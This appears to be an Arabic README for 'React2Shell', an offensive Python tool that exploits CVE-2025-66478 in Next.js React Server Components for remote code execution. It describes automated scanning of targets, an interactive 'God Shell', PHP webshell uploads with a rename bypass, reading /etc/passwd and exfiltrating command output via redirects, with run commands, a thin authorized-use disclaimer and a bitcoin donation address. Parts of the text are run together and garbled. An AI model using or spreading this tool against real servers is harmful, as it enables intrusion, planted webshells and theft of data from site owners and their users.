
React2Shell - استغلال CVE-2025-66478 RCE
تستغل هذه المجموعة بلغة Python تلويث النموذج الأولي لمكونات React Server Components (RSC) في Next.js مع سلسلة أداة React.lazy(-1) للحصول على وصول كامل لـ RCE، بما في ذلك God Shell تفاعلي، رفع ملف (PHP webshell dropper)، واستخراج البيانات عبر ?out=.

اكتشاف آلي واستغلال تطبيقات Next.js الضعيفة (مثل target.com). يقوم بإسقاط شل uid=33(www-data) مع:
child_process.execSync → /exploit?out=UIDread /etc/passwd)، رفع{\"0\":null} → 500 E{\"digest يؤكد معالج RSC.Location: /exploit?out=id_outputexecSync(cmd) → استخراج stdout/stderr عبر إعادة التوجيه.upload_txt local.txt remote.php → كتابة+إعادة تسمية تجاوز.pip3 install aiohttppython3 main.pyhttp://target.com أو targets.txt1=Detect 2=PoC(id) 3=Custom 4=God Shell [4]موصول عبر الأنابيب: echo \"http://target\n4\" | python3 main.py
أوامر God Shell:
upload <local.php> <remote/shell.php> # Direct PHP upload
upload_txt <local> <remote/shell.php> # TXT→rename bypass
upload_bin <local> <remote> # Binaries (chmod later)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABLE] → uid=33(www-data)aiohttp
pip install aiohttp
لأغراض اختبار الاختراق المصرح به والتعليم فقط (المستخدم يؤكد الإذن بموجب شروط الخدمة). الاستخدام غير المصرح به غير قانوني/غير أخلاقي.
اشتر لي قهوة:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans